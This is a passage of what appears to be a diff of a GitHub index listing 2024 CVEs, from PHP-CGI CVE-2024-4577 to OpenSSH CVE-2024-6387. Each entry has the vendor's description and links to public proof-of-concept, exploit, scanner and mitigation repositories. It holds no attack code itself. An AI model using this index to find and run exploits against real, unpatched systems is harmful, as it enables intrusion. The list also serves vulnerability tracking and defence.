[Sysc4ll3r/CVE-2024-4577](https://github.com/Sysc4ll3r/CVE-2024-4577) +- [WanLiChangChengWanLiChang/CVE-2024-4577-RCE-EXP](https://github.com/WanLiChangChengWanLiChang/CVE-2024-4577-RCE-EXP) +- [BitMEXResearch/CVE-2024-4577](https://github.com/BitMEXResearch/CVE-2024-4577) +- [0x20c/CVE-2024-4577-nuclei](https://github.com/0x20c/CVE-2024-4577-nuclei) +- [manuelinfosec/CVE-2024-4577](https://github.com/manuelinfosec/CVE-2024-4577) +- [zomasec/CVE-2024-4577](https://github.com/zomasec/CVE-2024-4577) +- [ZephrFish/CVE-2024-4577-PHP-RCE](https://github.com/ZephrFish/CVE-2024-4577-PHP-RCE) +- [xcanwin/CVE-2024-4577-PHP-RCE](https://github.com/xcanwin/CVE-2024-4577-PHP-RCE) +- [dbyMelina/CVE-2024-4577](https://github.com/dbyMelina/CVE-2024-4577) +- [Chocapikk/CVE-2024-4577](https://github.com/Chocapikk/CVE-2024-4577) +- [K3ysTr0K3R/CVE-2024-4577-EXPLOIT](https://github.com/K3ysTr0K3R/CVE-2024-4577-EXPLOIT) +- [bl4cksku11/CVE-2024-4577](https://github.com/bl4cksku11/CVE-2024-4577) +- [nemu1k5ma/CVE-2024-4577](https://github.com/nemu1k5ma/CVE-2024-4577) +- [aaddmin1122345/cve-2024-4577](https://github.com/aaddmin1122345/cve-2024-4577) +- [d3ck4/Shodan-CVE-2024-4577](https://github.com/d3ck4/Shodan-CVE-2024-4577) +- [Entropt/CVE-2024-4577_Analysis](https://github.com/Entropt/CVE-2024-4577_Analysis) +- [XiangDongCJC/CVE-2024-4577-PHP-CGI-RCE](https://github.com/XiangDongCJC/CVE-2024-4577-PHP-CGI-RCE) +- [hexedbyte/cve-2024-4577](https://github.com/hexedbyte/cve-2024-4577) +- [Sh0ckFR/CVE-2024-4577](https://github.com/Sh0ckFR/CVE-2024-4577) +- [gotr00t0day/CVE-2024-4577](https://github.com/gotr00t0day/CVE-2024-4577) +- [sug4r-wr41th/CVE-2024-4577](https://github.com/sug4r-wr41th/CVE-2024-4577) +- [VictorShem/CVE-2024-4577](https://github.com/VictorShem/CVE-2024-4577) +- [jakabakos/CVE-2024-4577-PHP-CGI-argument-injection-RCE](https://github.com/jakabakos/CVE-2024-4577-PHP-CGI-argument-injection-RCE) +- [PhinehasNarh/CVE-2024-4577-LetsDefend-walkthrough](https://github.com/PhinehasNarh/CVE-2024-4577-LetsDefend-walkthrough) +- [ggfzx/CVE-2024-4577](https://github.com/ggfzx/CVE-2024-4577) +- [olebris/CVE-2024-4577](https://github.com/olebris/CVE-2024-4577) +- [AlperenY-cs/CVE-2024-4577](https://github.com/AlperenY-cs/CVE-2024-4577) +- [charis3306/CVE-2024-4577](https://github.com/charis3306/CVE-2024-4577) +- [l0n3m4n/CVE-2024-4577-RCE](https://github.com/l0n3m4n/CVE-2024-4577-RCE) +- [bibo318/CVE-2024-4577-RCE-ATTACK](https://github.com/bibo318/CVE-2024-4577-RCE-ATTACK) +- [waived/CVE-2024-4577-PHP-RCE](https://github.com/waived/CVE-2024-4577-PHP-RCE) +- [nNoSuger/CVE-2024-4577](https://github.com/nNoSuger/CVE-2024-4577) +- [a-roshbaik/CVE-2024-4577](https://github.com/a-roshbaik/CVE-2024-4577) +- [a-roshbaik/CVE-2024-4577-PHP-RCE](https://github.com/a-roshbaik/CVE-2024-4577-PHP-RCE) +- [Jcccccx/CVE-2024-4577](https://github.com/Jcccccx/CVE-2024-4577) +- [bughuntar/CVE-2024-4577](https://github.com/bughuntar/CVE-2024-4577) +- [gh-ost00/CVE-2024-4577-RCE](https://github.com/gh-ost00/CVE-2024-4577-RCE) +- [ywChen-NTUST/PHP-CGI-RCE-Scanner](https://github.com/ywChen-NTUST/PHP-CGI-RCE-Scanner) +- [AhmedMansour93/Event-ID-268-Rule-Name-SOC292-Possible-PHP-Injection-Detected-CVE-2024-4577-](https://github.com/AhmedMansour93/Event-ID-268-Rule-Name-SOC292-Possible-PHP-Injection-Detected-CVE-2024-4577-) +- [phirojshah/CVE-2024-4577](https://github.com/phirojshah/CVE-2024-4577) +- [JeninSutradhar/CVE-2024-4577-checker](https://github.com/JeninSutradhar/CVE-2024-4577-checker) +- [longhoangth18/CVE-2024-4577](https://github.com/longhoangth18/CVE-2024-4577) +- [ahmetramazank/CVE-2024-4577](https://github.com/ahmetramazank/CVE-2024-4577) +- [BTtea/CVE-2024-4577-RCE-PoC](https://github.com/BTtea/CVE-2024-4577-RCE-PoC) + +### CVE-2024-4701 (2024-05-10) + +A path traversal issue potentially leading to remote code execution in Genie for all versions prior to 4.3.18 + + +- [JoeBeeton/CVE-2024-4701-POC](https://github.com/JoeBeeton/CVE-2024-4701-POC) + +### CVE-2024-4761 (2024-05-14) + +Out of bounds write in V8 in Google Chrome prior to 124.0.6367.207 allowed a remote attacker to perform an out of bounds memory write via a crafted HTML page. (Chromium security severity: High) + + +- [michredteam/CVE-2024-4761](https://github.com/michredteam/CVE-2024-4761) + +### CVE-2024-4875 (2024-05-21) + +The HT Mega – Absolute Addons For Elementor plugin for WordPress is vulnerable to unauthorized modification of data|loss of data due to a missing capability check on the 'ajax_dismiss' function in versions up to, and including, 2.5.2. This makes it possible for authenticated attackers, with subscriber-level permissions and above, to update options such as users_can_register, which can lead to unauthorized user registration. + + +- [RandomRobbieBF/CVE-2024-4875](https://github.com/RandomRobbieBF/CVE-2024-4875) + +### CVE-2024-4879 (2024-07-10) + +ServiceNow has addressed an input validation vulnerability that was identified in Vancouver and Washington DC Now Platform releases. This vulnerability could enable an unauthenticated user to remotely execute code within the context of the Now Platform. ServiceNow applied an update to hosted instances, and ServiceNow released the update to our partners and self-hosted customers. Listed below are the patches and hot fixes that address the vulnerability. If you have not done so already, we recommend applying security patches relevant to your instance as soon as possible. + + +- [Brut-Security/CVE-2024-4879](https://github.com/Brut-Security/CVE-2024-4879) +- [bigb0x/CVE-2024-4879](https://github.com/bigb0x/CVE-2024-4879) +- [Mr-r00t11/CVE-2024-4879](https://github.com/Mr-r00t11/CVE-2024-4879) +- [ShadowByte1/CVE-2024-4879](https://github.com/ShadowByte1/CVE-2024-4879) +- [Praison001/CVE-2024-4879-ServiceNow](https://github.com/Praison001/CVE-2024-4879-ServiceNow) +- [NoTsPepino/CVE-2024-4879-CVE-2024-5217-ServiceNow-RCE-Scanning](https://github.com/NoTsPepino/CVE-2024-4879-CVE-2024-5217-ServiceNow-RCE-Scanning) +- [jdusane/CVE-2024-4879](https://github.com/jdusane/CVE-2024-4879) +- [gh-ost00/CVE-2024-4879](https://github.com/gh-ost00/CVE-2024-4879) +- [0xWhoami35/CVE-2024-4879](https://github.com/0xWhoami35/CVE-2024-4879) + +### CVE-2024-4883 (2024-06-25) + +In WhatsUp Gold versions released before 2023.1.3, a Remote Code Execution issue exists in Progress WhatsUp Gold. This vulnerability allows an unauthenticated attacker to achieve the RCE as a service account through NmApi.exe. + + +- [sinsinology/CVE-2024-4883](https://github.com/sinsinology/CVE-2024-4883) + +### CVE-2024-4885 (2024-06-25) + +In WhatsUp Gold versions released before 2023.1.3, an unauthenticated Remote Code Execution vulnerability in Progress WhatsUpGold.  The \n\nWhatsUp.ExportUtilities.Export.GetFileWithoutZip\n\n\n\n allows execution of commands with iisapppool\nmconsole privileges. + + +- [sinsinology/CVE-2024-4885](https://github.com/sinsinology/CVE-2024-4885) + +### CVE-2024-4898 (2024-06-12) + +The InstaWP Connect – 1-click WP Staging & Migration plugin for WordPress is vulnerable to arbitrary option updates due to a missing authorization checks on the REST API calls in all versions up to, and including, 0.1.0.38. This makes it possible for unauthenticated attackers to connect the site to InstaWP API, edit arbitrary site options and create administrator accounts. + + +- [truonghuuphuc/CVE-2024-4898-Poc](https://github.com/truonghuuphuc/CVE-2024-4898-Poc) +- [cve-2024/CVE-2024-4898-Poc](https://github.com/cve-2024/CVE-2024-4898-Poc) + +### CVE-2024-4956 (2024-05-16) + +Path Traversal in Sonatype Nexus Repository 3 allows an unauthenticated attacker to read system files. Fixed in version 3.68.1. + + +- [banditzCyber0x/CVE-2024-4956](https://github.com/banditzCyber0x/CVE-2024-4956) +- [xungzzz/CVE-2024-4956](https://github.com/xungzzz/CVE-2024-4956) +- [erickfernandox/CVE-2024-4956](https://github.com/erickfernandox/CVE-2024-4956) +- [gmh5225/CVE-2024-4956](https://github.com/gmh5225/CVE-2024-4956) +- [ifconfig-me/CVE-2024-4956-Bulk-Scanner](https://github.com/ifconfig-me/CVE-2024-4956-Bulk-Scanner) +- [thinhap/CVE-2024-4956-PoC](https://github.com/thinhap/CVE-2024-4956-PoC) +- [yagyuufellinluvv/CVE-2024-4956](https://github.com/yagyuufellinluvv/CVE-2024-4956) +- [GoatSecurity/CVE-2024-4956](https://github.com/GoatSecurity/CVE-2024-4956) +- [TypicalModMaker/CVE-2024-4956](https://github.com/TypicalModMaker/CVE-2024-4956) +- [Praison001/CVE-2024-4956-Sonatype-Nexus-Repository-Manager](https://github.com/Praison001/CVE-2024-4956-Sonatype-Nexus-Repository-Manager) +- [Cappricio-Securities/CVE-2024-4956](https://github.com/Cappricio-Securities/CVE-2024-4956) +- [fin3ss3g0d/CVE-2024-4956](https://github.com/fin3ss3g0d/CVE-2024-4956) +- [verylazytech/CVE-2024-4956](https://github.com/verylazytech/CVE-2024-4956) +- [JolyIrsb/CVE-2024-4956](https://github.com/JolyIrsb/CVE-2024-4956) +- [UMASANKAR-MG/Path-Traversal-CVE-2024-4956](https://github.com/UMASANKAR-MG/Path-Traversal-CVE-2024-4956) +- [An00bRektn/shirocrack](https://github.com/An00bRektn/shirocrack) + +### CVE-2024-5009 (2024-06-25) + +In WhatsUp Gold versions released before 2023.1.3, an Improper Access Control vulnerability in Wug.UI.Controllers.InstallController.SetAdminPassword allows local attackers to modify admin's password. + + +- [sinsinology/CVE-2024-5009](https://github.com/sinsinology/CVE-2024-5009) +- [th3gokul/CVE-2024-5009](https://github.com/th3gokul/CVE-2024-5009) + +### CVE-2024-5057 (2024-08-29) + +Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Easy Digital Downloads allows SQL Injection.This issue affects Easy Digital Downloads: from n/a through 3.2.12. + + +- [g1thubb004/poc-CVE-2024-5057](https://github.com/g1thubb004/poc-CVE-2024-5057) + +### CVE-2024-5084 (2024-05-23) + +The Hash Form – Drag & Drop Form Builder plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the 'file_upload_action' function in all versions up to, and including, 1.1.0. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible. + + +- [KTN1990/CVE-2024-5084](https://github.com/KTN1990/CVE-2024-5084) +- [Chocapikk/CVE-2024-5084](https://github.com/Chocapikk/CVE-2024-5084) +- [k3lpi3b4nsh33/CVE-2024-5084](https://github.com/k3lpi3b4nsh33/CVE-2024-5084) +- [WOOOOONG/CVE-2024-5084](https://github.com/WOOOOONG/CVE-2024-5084) +- [z1gazaga/CVE-2024-5084](https://github.com/z1gazaga/CVE-2024-5084) + +### CVE-2024-5124 (2024-06-06) + +A timing attack vulnerability exists in the gaizhenbiao/chuanhuchatgpt repository, specifically within the password comparison logic. The vulnerability is present in version 20240310 of the software, where passwords are compared using the '=' operator in Python. This method of comparison allows an attacker to guess passwords based on the timing of each character's comparison. The issue arises from the code segment that checks a password for a particular username, which can lead to the exposure of sensitive information to an unauthorized actor. An attacker exploiting this vulnerability could potentially guess user passwords, compromising the security of the system. + + +- [gogo2464/CVE-2024-5124](https://github.com/gogo2464/CVE-2024-5124) + +### CVE-2024-5246 (2024-05-23) + +NETGEAR ProSAFE Network Management System Tomcat Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of NETGEAR ProSAFE Network Management System. Authentication is required to exploit this vulnerability.\n\nThe specific flaw exists within the product installer. The issue results from the use of a vulnerable version of Apache Tomcat. An attacker can leverage this vulnerability to execute code in the context of SYSTEM. Was ZDI-CAN-22868. + + +- [Abdurahmon3236/CVE-2024-5246](https://github.com/Abdurahmon3236/CVE-2024-5246) + +### CVE-2024-5274 (2024-05-28) + +Type Confusion in V8 in Google Chrome prior to 125.0.6422.112 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: High) + + +- [Alchemist3dot14/CVE-2024-5274-Detection](https://github.com/Alchemist3dot14/CVE-2024-5274-Detection) +- [mistymntncop/CVE-2024-5274](https://github.com/mistymntncop/CVE-2024-5274) + +### CVE-2024-5324 (2024-06-06) + +The Login/Signup Popup ( Inline Form + Woocommerce ) plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'import_settings' function in versions 2.7.1 to 2.7.2. This makes it possible for authenticated attackers, with Subscriber-level access and above, to change arbitrary options on affected sites. This can be used to enable new user registration and set the default role for new users to Administrator. + + +- [RandomRobbieBF/CVE-2024-5324](https://github.com/RandomRobbieBF/CVE-2024-5324) + +### CVE-2024-5326 (2024-05-30) + +The Post Grid Gutenberg Blocks and WordPress Blog Plugin – PostX plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'postx_presets_callback' function in all versions up to, and including, 4.1.2. This makes it possible for authenticated attackers, with Contributor-level access and above, to change arbitrary options on affected sites. This can be used to enable new user registration and set the default role for new users to Administrator. + + +- [truonghuuphuc/CVE-2024-5326-Poc](https://github.com/truonghuuphuc/CVE-2024-5326-Poc) +- [cve-2024/CVE-2024-5326-Poc](https://github.com/cve-2024/CVE-2024-5326-Poc) + +### CVE-2024-5356 (2024-05-26) + +Es wurde eine Schwachstelle in anji-plus AJ-Report bis 1.4.1 gefunden. Sie wurde als kritisch eingestuft. Dabei betrifft es einen unbekannter Codeteil der Datei /dataSet/testTransform;swagger-ui. Mit der Manipulation des Arguments dynSentence mit unbekannten Daten kann eine sql injection-Schwachstelle ausgenutzt werden. Die Umsetzung des Angriffs kann dabei über das Netzwerk erfolgen. Der Exploit steht zur öffentlichen Verfügung. + + +- [droyuu/Aj-Report-sql-CVE-2024-5356-POC](https://github.com/droyuu/Aj-Report-sql-CVE-2024-5356-POC) + +### CVE-2024-5420 (2024-06-04) + +Missing input validation in the SEH Computertechnik utnserver Pro, SEH Computertechnik utnserver ProMAX, SEH Computertechnik INU-100 web-interface allows stored Cross-Site Scripting (XSS)..This issue affects utnserver Pro, utnserver ProMAX, INU-100 version 20.1.22 and below. + + +- [gh-ost00/CVE-2024-5420-XSS](https://github.com/gh-ost00/CVE-2024-5420-XSS) +- [K4yd0/CVE-2024-5420_XSS](https://github.com/K4yd0/CVE-2024-5420_XSS) + +### CVE-2024-5452 (2024-06-06) + +A remote code execution (RCE) vulnerability exists in the lightning-ai/pytorch-lightning library version 2.2.1 due to improper handling of deserialized user input and mismanagement of dunder attributes by the `deepdiff` library. The library uses `deepdiff.Delta` objects to modify application state based on frontend actions. However, it is possible to bypass the intended restrictions on modifying dunder attributes, allowing an attacker to construct a serialized delta that passes the deserializer whitelist and contains dunder attributes. When processed, this can be exploited to access other modules, classes, and instances, leading to arbitrary attribute write and total RCE on any self-hosted pytorch-lightning application in its default configuration, as the delta endpoint is enabled by default. + + +- [XiaomingX/cve-2024-5452-poc](https://github.com/XiaomingX/cve-2024-5452-poc) + +### CVE-2024-5522 (2024-06-20) + +The HTML5 Video Player WordPress plugin before 2.5.27 does not sanitize and escape a parameter from a REST route before using it in a SQL statement, allowing unauthenticated users to perform SQL injection attacks + + +- [truonghuuphuc/CVE-2024-5522-Poc](https://github.com/truonghuuphuc/CVE-2024-5522-Poc) +- [kryptonproject/CVE-2024-5522-PoC](https://github.com/kryptonproject/CVE-2024-5522-PoC) +- [geniuszlyy/CVE-2024-5522](https://github.com/geniuszlyy/CVE-2024-5522) + +### CVE-2024-5633 (2024-07-09) + +Longse model LBH30FE200W cameras, as well as products based on this device, provide an unrestricted access for an attacker located in the same local network to an undocumented binary service CoolView on one of the ports. \nAn attacker with a knowledge of the available commands is able to perform read/write operations on the device's memory, which might result in e.g. bypassing telnet login and obtaining full access to the device. + + +- [Adikso/CVE-2024-5633](https://github.com/Adikso/CVE-2024-5633) + +### CVE-2024-5735 (2024-06-28) + +Full Path Disclosure vulnerability in AdmirorFrames Joomla! extension in afHelper.php script allows an unauthorised attacker to retrieve location of web root folder. This issue affects AdmirorFrames: before 5.0. + + +- [afine-com/CVE-2024-5735](https://github.com/afine-com/CVE-2024-5735) + +### CVE-2024-5736 (2024-06-28) + +Server Side Request Forgery (SSRF) vulnerability in AdmirorFrames Joomla! extension in afGdStream.php script allows to access local files or server pages available only from localhost. This issue affects AdmirorFrames: before 5.0. + + +- [afine-com/CVE-2024-5736](https://github.com/afine-com/CVE-2024-5736) + +### CVE-2024-5737 (2024-06-28) + +Script afGdStream.php in AdmirorFrames Joomla! extension doesn’t specify a content type and as a result default (text/html) is used. An attacker may embed HTML tags directly in image data which is rendered by a webpage as HTML. This issue affects AdmirorFrames: before 5.0. + + +- [afine-com/CVE-2024-5737](https://github.com/afine-com/CVE-2024-5737) + +### CVE-2024-5764 (2024-10-23) + +Use of Hard-coded Credentials vulnerability in Sonatype Nexus Repository has been discovered in the code responsible for encrypting any secrets stored in the Nexus Repository configuration database (SMTP or HTTP proxy credentials, user tokens, tokens, among others). The affected versions relied on a static hard-coded encryption passphrase. While it was possible for an administrator to define an alternate encryption passphrase, it could only be done at first boot and not updated.\n\nThis issue affects Nexus Repository: from 3.0.0 through 3.72.0. + + +- [fin3ss3g0d/CVE-2024-5764](https://github.com/fin3ss3g0d/CVE-2024-5764) + +### CVE-2024-5806 (2024-06-25) + +Improper Authentication vulnerability in Progress MOVEit Transfer (SFTP module) can lead to Authentication Bypass.This issue affects MOVEit Transfer: from 2023.0.0 before 2023.0.11, from 2023.1.0 before 2023.1.6, from 2024.0.0 before 2024.0.2. + + +- [watchtowrlabs/watchTowr-vs-progress-moveit_CVE-2024-5806](https://github.com/watchtowrlabs/watchTowr-vs-progress-moveit_CVE-2024-5806) + +### CVE-2024-5910 (2024-07-10) + +Missing authentication for a critical function in Palo Alto Networks Expedition can lead to an Expedition admin account takeover for attackers with network access to Expedition.\n\nNote: Expedition is a tool aiding in configuration migration, tuning, and enrichment. Configuration secrets, credentials, and other data imported into Expedition is at risk due to this issue. + + +- [p33d/Palo-Alto-Expedition-Remote-Code-Execution-Exploit-CVE-2024-5910-CVE-2024-9464](https://github.com/p33d/Palo-Alto-Expedition-Remote-Code-Execution-Exploit-CVE-2024-5910-CVE-2024-9464) + +### CVE-2024-5932 (2024-08-20) + +The GiveWP – Donation Plugin and Fundraising Platform plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 3.14.1 via deserialization of untrusted input from the 'give_title' parameter. This makes it possible for unauthenticated attackers to inject a PHP Object. The additional presence of a POP chain allows attackers to execute code remotely, and to delete arbitrary files. + + +- [0xb0mb3r/CVE-2024-5932-PoC](https://github.com/0xb0mb3r/CVE-2024-5932-PoC) +- [EQSTLab/CVE-2024-5932](https://github.com/EQSTLab/CVE-2024-5932) +- [OxLmahdi/cve-2024-5932](https://github.com/OxLmahdi/cve-2024-5932) + +### CVE-2024-5947 (2024-06-13) + +Deep Sea Electronics DSE855 Configuration Backup Missing Authentication Information Disclosure Vulnerability. This vulnerability allows network-adjacent attackers to disclose sensitive information on affected installations of Deep Sea Electronics DSE855 devices. Authentication is not required to exploit this vulnerability.\n\nThe specific flaw exists within the web-based UI. The issue results from the lack of authentication prior to allowing access to functionality. An attacker can leverage this vulnerability to disclose stored credentials, leading to further compromise. Was ZDI-CAN-22679. + + +- [Cappricio-Securities/CVE-2024-5947](https://github.com/Cappricio-Securities/CVE-2024-5947) + +### CVE-2024-5961 (2024-06-14) + +Improper neutralization of input during web page generation vulnerability in 2ClickPortal software allows reflected cross-site scripting (XSS). An attacker might trick somebody into using a crafted URL, which will cause a script to be run in user's browser. This issue affects 2ClickPortal software versions from 7.2.31 through 7.6.4. + + +- [kac89/CVE-2024-5961](https://github.com/kac89/CVE-2024-5961) + +### CVE-2024-6028 (2024-06-25) + +The Quiz Maker plugin for WordPress is vulnerable to time-based SQL Injection via the 'ays_questions' parameter in all versions up to, and including, 6.5.8.3 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. + + +- [truonghuuphuc/CVE-2024-6028-Poc](https://github.com/truonghuuphuc/CVE-2024-6028-Poc) + +### CVE-2024-6043 (2024-06-17) + +Es wurde eine Schwachstelle in SourceCodester Best House Rental Management System 1.0 entdeckt. Sie wurde als kritisch eingestuft. Es geht dabei um die Funktion login der Datei admin_class.php. Durch Manipulation des Arguments username mit unbekannten Daten kann eine sql injection-Schwachstelle ausgenutzt werden. Der Angriff kann über das Netzwerk passieren. Der Exploit steht zur öffentlichen Verfügung. + + +- [lfillaz/CVE-2024-6043](https://github.com/lfillaz/CVE-2024-6043) + +### CVE-2024-6050 (2024-07-01) + +Improper Neutralization of Input During Web Page Generation vulnerability in SOKRATES-software SOWA OPAC allows a Reflected Cross-Site Scripting (XSS). An attacker might trick somebody into using a crafted URL, which will cause a script to be run in user's browser. This issue affects SOWA OPAC software in versions from 4.0 before 4.9.10, from 5.0 before 6.2.12. + + +- [kac89/CVE-2024-6050](https://github.com/kac89/CVE-2024-6050) + +### CVE-2024-6095 (2024-07-06) + +A vulnerability in the /models/apply endpoint of mudler/localai versions 2.15.0 allows for Server-Side Request Forgery (SSRF) and partial Local File Inclusion (LFI). The endpoint supports both http(s):// and file:// schemes, where the latter can lead to LFI. However, the output is limited due to the length of the error message. This vulnerability can be exploited by an attacker with network access to the LocalAI instance, potentially allowing unauthorized access to internal HTTP(s) servers and partial reading of local files. The issue is fixed in version 2.17. + + +- [Abdurahmon3236/-CVE-2024-6095](https://github.com/Abdurahmon3236/-CVE-2024-6095) + +### CVE-2024-6205 (2024-07-19) + +The PayPlus Payment Gateway WordPress plugin before 6.6.9 does not properly sanitise and escape a parameter before using it in a SQL statement via a WooCommerce API route available to unauthenticated users, leading to an SQL injection vulnerability. + + +- [j3r1ch0123/CVE-2024-6205](https://github.com/j3r1ch0123/CVE-2024-6205) + +### CVE-2024-6222 (2024-07-09) + +In Docker Desktop before v4.29.0, an attacker who has gained access to the Docker Desktop VM through a container breakout can further escape to the host by passing extensions and dashboard related IPC messages.\n\nDocker Desktop v4.29.0 https://docs.docker.com/desktop/release-notes/#4290 fixes the issue on MacOS, Linux and Windows with Hyper-V backend.\n\nAs exploitation requires "Allow only extensions distributed through the Docker Marketplace" to be disabled, Docker Desktop  v4.31.0 https://docs.docker.com/desktop/release-notes/#4310  additionally changes the default configuration to enable this setting by default. + + +- [Florian-Hoth/CVE-2024-6222](https://github.com/Florian-Hoth/CVE-2024-6222) + +### CVE-2024-6366 (2024-07-29) + +The User Profile Builder WordPress plugin before 3.11.8 does not have proper authorisation, allowing unauthenticated users to upload media files via the async upload functionality of WP. + + +- [Abdurahmon3236/CVE-2024-6366](https://github.com/Abdurahmon3236/CVE-2024-6366) + +### CVE-2024-6386 (2024-08-21) + +The WPML plugin for WordPress is vulnerable to Remote Code Execution in all versions up to, and including, 4.6.12 via the Twig Server-Side Template Injection. This is due to missing input validation and sanitization on the render function. This makes it possible for authenticated attackers, with Contributor-level access and above, to execute code on the server. + + +- [argendo/CVE-2024-6386](https://github.com/argendo/CVE-2024-6386) + +### CVE-2024-6387 (2024-07-01) + +A security regression (CVE-2006-5051) was discovered in OpenSSH's server (sshd). There is a race condition which can lead sshd to handle some signals in an unsafe manner. An unauthenticated, remote attacker may be able to trigger it by failing to authenticate within a set time period. + + +- [zgzhang/cve-2024-6387-poc](https://github.com/zgzhang/cve-2024-6387-poc) +- [acrono/cve-2024-6387-poc](https://github.com/acrono/cve-2024-6387-poc) +- [lflare/cve-2024-6387-poc](https://github.com/lflare/cve-2024-6387-poc) +- [shyrwall/cve-2024-6387-poc](https://github.com/shyrwall/cve-2024-6387-poc) +- [getdrive/CVE-2024-6387-PoC](https://github.com/getdrive/CVE-2024-6387-PoC) +- [FerasAlrimali/CVE-2024-6387-POC](https://github.com/FerasAlrimali/CVE-2024-6387-POC) +- [passwa11/cve-2024-6387-poc](https://github.com/passwa11/cve-2024-6387-poc) +- [jack0we/CVE-2024-6387](https://github.com/jack0we/CVE-2024-6387) +- [xaitax/CVE-2024-6387_Check](https://github.com/xaitax/CVE-2024-6387_Check) +- [bigb0x/CVE-2024-6387](https://github.com/bigb0x/CVE-2024-6387) +- [wiggels/regresshion-check](https://github.com/wiggels/regresshion-check) +- [3yujw7njai/CVE-2024-6387](https://github.com/3yujw7njai/CVE-2024-6387) +- [betancour/OpenSSH-Vulnerability-test](https://github.com/betancour/OpenSSH-Vulnerability-test) +- [muyuanlove/CVE-2024-6387fixshell](https://github.com/muyuanlove/CVE-2024-6387fixshell) +- [TAM-K592/CVE-2024-6387](https://github.com/TAM-K592/CVE-2024-6387) +- [teamos-hub/regreSSHion](https://github.com/teamos-hub/regreSSHion) +- [Maikefee/CVE-2024-6387_Check.py](https://github.com/Maikefee/CVE-2024-6387_Check.py) +- [ahlfors/CVE-2024-6387](https://github.com/ahlfors/CVE-2024-6387) +- [Mufti22/CVE-2024-6387-checkher](https://github.com/Mufti22/CVE-2024-6387-checkher) +- [thegenetic/CVE-2024-6387-exploit](https://github.com/thegenetic/CVE-2024-6387-exploit) +- [R4Tw1z/CVE-2024-6387](https://github.com/R4Tw1z/CVE-2024-6387) +- [d0rb/CVE-2024-6387](https://github.com/d0rb/CVE-2024-6387) +- [CiderAndWhisky/regression-scanner](https://github.com/CiderAndWhisky/regression-scanner) +- [shamo0/CVE-2024-6387_PoC](https://github.com/shamo0/CVE-2024-6387_PoC) +- [paradessia/CVE-2024-6387-nmap](https://github.com/paradessia/CVE-2024-6387-nmap) +- [SecWithMoh/CVE-2024-6387](https://github.com/SecWithMoh/CVE-2024-6387) +- [PrincipalAnthony/CVE-2024-6387-Updated-x64bit](https://github.com/PrincipalAnthony/CVE-2024-6387-Updated-x64bit) +- [skyalliance/CVE-2024-6387-POC](https://github.com/skyalliance/CVE-2024-6387-POC) +- [daniel-odrinski/CVE-2024-6387-Mitigation-Ansible-Playbook](https://github.com/daniel-odrinski/CVE-2024-6387-Mitigation-Ansible-Playbook) +- [rumochnaya/openssh-cve-2024-6387.sh](https://github.com/rumochnaya/openssh-cve-2024-6387.sh) +- [zenzue/CVE-2024-6387-Mitigation](https://github.com/zenzue/CVE-2024-6387-Mitigation) +- [devarshishimpi/CVE-2024-6387-Check](https://github.com/devarshishimpi/CVE-2024-6387-Check) +- [hssmo/cve-2024-6387_AImade](https://github.com/hssmo/cve-2024-6387_AImade) +- [ACHUX21/checker-CVE-2024-6387](https://github.com/ACHUX21/checker-CVE-2024-6387) +- [AiGptCode/ssh_exploiter_CVE-2024-6387](https://github.com/AiGptCode/ssh_exploiter_CVE-2024-6387) +- [xristos8574/regreSSHion-nmap-scanner](https://github.com/xristos8574/regreSSHion-nmap-scanner) +- [xonoxitron/regreSSHion](https://github.com/xonoxitron/regreSSHion) +- [no-one-sec/CVE-2024-6387](https://github.com/no-one-sec/CVE-2024-6387) +- [dawnl3ss/CVE-2024-6387](https://github.com/dawnl3ss/CVE-2024-6387) +- [MrR0b0t19/CVE-2024-6387-Exploit-POC](https://github.com/MrR0b0t19/CVE-2024-6387-Exploit-POC) +- [th3gokul/CVE-2024-6387](https://github.com/th3gokul/CVE-2024-6387) +- [n1cks0n/Test_CVE-2024-6387](https://github.com/n1cks0n/Test_CVE-2024-6387) +- [l0n3m4n/CVE-2024-6387](https://github.com/l0n3m4n/CVE-2024-6387) +- [RickGeex/CVE-2024-6387-Checker](https://github.com/RickGeex/CVE-2024-6387-Checker) +- [xonoxitron/regreSSHion-checker](https://github.com/xonoxitron/regreSSHion-checker) +- [BrandonLynch2402/cve-2024-6387-nuclei-template](https://github.com/BrandonLynch2402/cve-2024-6387-nuclei-template) +- [edsonjt81/CVE-2024-6387_Check](https://github.com/edsonjt81/CVE-2024-6387_Check) +- [grupooruss/CVE-2024-6387](https://github.com/grupooruss/CVE-2024-6387) +- [CognisysGroup/CVE-2024-6387-Checker](https://github.com/CognisysGroup/CVE-2024-6387-Checker) +- [sxlmnwb/CVE-2024-6387](https://github.com/sxlmnwb/CVE-2024-6387) +- [Symbolexe/CVE-2024-6387](https://github.com/Symbolexe/CVE-2024-6387) +- [harshinsecurity/sentinelssh](https://github.com/harshinsecurity/sentinelssh) +- [t3rry327/cve-2024-6387-poc](https://github.com/t3rry327/cve-2024-6387-poc) +- [jocker2410/CVE-2024-6387_poc](https://github.com/jocker2410/CVE-2024-6387_poc) +- [liqhtnd/sshd-logingracetime0](https://github.com/liqhtnd/sshd-logingracetime0) +- [JackSparrowhk/ssh-CVE-2024-6387-poc](https://github.com/JackSparrowhk/ssh-CVE-2024-6387-poc) +- [turbobit/CVE-2024-6387-OpenSSH-Vulnerability-Checker](https://github.com/turbobit/CVE-2024-6387-OpenSSH-Vulnerability-Checker) +- [sms2056/CVE-2024-6387](https://github.com/sms2056/CVE-2024-6387) +- [invaderslabs/regreSSHion-CVE-2024-6387-](https://github.com/invaderslabs/regreSSHion-CVE-2024-6387-) +- [lala-amber/CVE-2024-6387](https://github.com/lala-amber/CVE-2024-6387) +- [4lxprime/regreSSHive](https://github.com/4lxprime/regreSSHive) +- [sardine-web/CVE-2024-6387_Check](https://github.com/sardine-web/CVE-2024-6387_Check) +- [0x4D31/cve-2024-6387_hassh](https://github.com/0x4D31/cve-2024-6387_hassh) +- [sardine-web/CVE-2024-6387-template](https://github.com/sardine-web/CVE-2024-6387-template) +- 